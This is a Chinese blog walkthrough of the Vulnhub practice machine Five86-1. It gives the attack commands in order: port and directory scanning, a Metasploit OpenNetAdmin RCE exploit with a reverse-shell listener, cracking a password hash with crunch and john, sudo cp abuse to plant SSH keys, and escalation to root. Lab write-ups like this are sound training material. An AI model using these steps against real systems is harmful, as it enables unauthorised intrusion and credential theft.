渗透测试学习之靶机Five86-1

最新推荐文章于 2023-04-04 20:59:21 发布
最新推荐文章于 2023-04-04 20:59:21 发布
阅读量540 收藏 3
点赞数
分类专栏: 靶机 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44426869/article/details/105000096
版权
过程
1. 探测目标主机

nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.147
在这里插入图片描述

2. 信息搜集
  • 端口信息
    nmap -sV -p 1-65535 192.168.246.147
    在这里插入图片描述
    2个http端口,80是Apache,10000那个查一下:
    在这里插入图片描述
  • web站点相关服务信息
    80Apache下的站点:
    在这里插入图片描述
    10000端口下的集成环境:
    在这里插入图片描述
    服务信息看不出啥
  • 目录信息
    直接使用kali里的dirb:
    dirb http://192.168.246.147
    在这里插入图片描述
    打开robots.txt:
    在这里插入图片描述
    打开ona:
    在这里插入图片描述
    搞不懂这是个啥,百度:
    在这里插入图片描述
    看一下版本:
    在这里插入图片描述
3. RCEgetshell

kali里搜一下相关漏洞:
searchsploit opennetadmin
在这里插入图片描述
刚刚好对应上了RCE。
进入该目录,然后./47691.sh http://192.168.246.147/ona/login.php
一直报错,中途进去删了空行,没改回原来的样子,大致是这样:
在这里插入图片描述
至于login.php是怎么找到,点击右上角的logout后,出现logout.php,试下login.php就出现登录界面。
漏洞库找下EXP,看到个msf版的:
在这里插入图片描述
下载后拉进kali,我放的位置是/usr/share/metasploit-framework/modules/exploits/unix/
在这里插入图片描述
然后在msf里重新加载,reload_all
在这里插入图片描述
使用该exp:use exploit/unix/47772
查看所需配置:show options
在这里插入图片描述
设置目标IP,反弹IP:
set rhosts 192.168.246.147
set srvhost 192.168.246.138
set lhost 192.168.246.138
在这里插入图片描述
expolit
在这里插入图片描述
shell后,获取交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
进入html目录,查看文件:
在这里插入图片描述
在这里插入图片描述
根据.htaccess里的提示找到.htpasswd:
cd /var/www
ls -la
cat .htpasswd
在这里插入图片描述
是一个用户的账户密码,提示密码10位数且只有aefhrt这些字符,用crunch生成字典:
crunch 10 10 aefhrt -o /root/Desktop/dic.txt
在这里插入图片描述
将.htpasswd中的密码保存到文件中,使用生成的字典john爆破一下:
john --wordlist=/root/Desktop/dic.txt /root/Desktop/86-1.txt
在这里插入图片描述
得到密码:fatherrrrr
切换到douglas用户,然后查看权限:
在这里插入图片描述
/bin/cp也就是copy命令可以使用Jen用户权限免密执行,在douglas下,看到隐藏的.ssh,那么把它cp到jen目录下就可以使用ssh密钥登录jen了:
在这里插入图片描述
Linux密钥登录原理和ssh使用密钥实现免密码登陆
将公钥复制到jen里:
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
在这里插入图片描述
登录:
ssh jen@192.168.246.147
在这里插入图片描述
登录上就提示You have new mail.
查看
cd /var/mail
ls
cat jen
看到一篇挺长的邮件:
在这里插入图片描述
重点在这里:
在这里插入图片描述
moss的密码是Fire!Fire!
切换用户:
cd
ls -la
来到moss的目录下看到隐藏的games:
在这里插入图片描述
进入该目录后查看文件,有个root:
在这里插入图片描述
打开看后是乱码,然后执行一下就蹦出了这个:
在这里插入图片描述
直接进入root目录,找到flag.txt:
在这里插入图片描述

总结
  • 扩展起来挺多东西的。
wxlblh
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
five86-1靶机
薛定谔嘚喵博客
04-04 158
OpenNetAdmin 提供了一个数据库管理库存的IP网络.每个主机可以跟踪通过一个集中的AJAX的web界 面,可以帮助减少跟踪误差,并为您提供的一个工具.该项目OpenNetAdmin希望能提供一个有用的网络管理应用程序,用于管理您的IP子网和主机. 停止使用的电子表格来管理您的网络!查看moss家目录,发现了一个隐藏目录为.games,查看.games看到upyourgame的所属者和所属组有点意思,全是root,并且可执行。发现可以用jen用户的身份执行/bin/cp,且无密码。
five86-1靶机渗透攻略
weixin_47311099的博客
01-11 1190
five86-1攻略 下载地址https://www.five86.com/five86-1.html 主机发现 nmap -sP 192.168.8.0/24 目标IP地址为 192.168.8.141 端口扫描 nmap -A 192.168.8.141 -p- 发现22ssh、80http、10000Webmin(基于web的unix管理工具) 访问80端口 空白页面 后台扫描 dirb http://192.168.8.141 robots文件里发现一个/ona目录,访问后得到 o
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 1874
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
渗透five86-3
Ays.Ie的博客
03-03 513
本篇文章为five86的第3个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
vulnhub five86-1
m0_64815693的博客
03-04 2128
vulnhub five86-1
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Five86-2靶机渗透记录
Jach1n
01-31 211
Five86-2靶机渗透记录
Vulnhub靶机Five86-1详细解析
蚁景网安学院
01-15 449
喜欢就关注我吧,订阅更多最新消息文章字数1539 预计阅读时长7分钟 涉及知识点实操练习-VulnHub渗透测试实战靶场Node 1.0https://www.hetianlab.c...
记一次vulnhub|渗透测试Five86-1
crispr的博客
01-26 646
vulnhub Literally-Vulnerable 0X01 Main Point 1.sploitdb的使用 2.crunch字典生成和john爆破的混搭 3.利用kali进行SSH和靶机连接 4.sudo -l查看用户被授予其它权限的文件 0X02 前期嗅探和端口探测 arp-scan -l得到靶机IP: nmap -sS -A -p- 172.20.10.3扫描靶机IP的端口开...
vulnhub之Five86-1
底层社会中的弱智
02-04 748
针对目标机器,先扫描找出靶机然后再扫端口查看服务 Nmap -Pn ip网段 是用nmap -A -p- -T4 192.168.127.130 查看详细的端口服务 上图可以得知: 22端口SSH服务开启(攻击方法有 针对第三方SSH软件版本漏洞的攻击 暴力破解 匿名登录 弱口令) 80端口是HTTP服务(网站的十大常规漏洞 第三方框架WORDPRESS之类 apache解析漏...
渗透测试靶机vulnhub_five86:1
weixin_46128614的博客
03-31 302
靶机下载地址:five86:1 首先扫描端口 nmap 192.168.49.137 -sS -sV -p- -T5 -A 发现只开了80端口访问 发现一个cms opennetadmin 搜索该cms是否有直接可利用的exp,果然存在 反弹回一个webshell 搜集linux系统信息,检查一下内核版本,没有内核提权漏洞 在后台配置文件找到数据库密码 用one_password 爆...
《Vulnhub通关手册》—— 04 Five86-1
weixin_53801131的博客
12-30 551
Vulnhub通关手册——04 Five86-1 背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为100.10.10.133,将该IP地址添加到hosts文件中,映射到域名five86.local 技术要点: opennetadmin漏洞利用 find / -type f -user 用户名查看该用户名可以读取的文件 使用hash-identifier查看加密方式 使用crunch生成字典 使用hashcat工具进行密码破解
『VulnHub系列』five86_1-Walkthrough
ins1ght的博客
01-23 907
这是我完成的VulnHub上的第36个靶机靶机发布日期:2020年1月8日,难度:初级+。
oscp——five86-1
王嘟嘟的博客
01-19 2614
0x00 前言 这个是练习的第8个机子。同学推过来的是Five86-2,我这里先把Five86-1做了。第七个机子可能是我的环境有问题。无法进行复现。 0x01 实验 1.信息收集 1.1 ip收集 1.2开放端口 2.攻击尝试 2.1 端口攻击尝试 22端口,暂时没有爆破 2.2 web攻击尝试 访问一下啥都没有。。。老规矩,简单扫一下目录 可以看到有一个robots.txt 看到一个o...
渗透DC-1靶机设计思路
最新发布
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值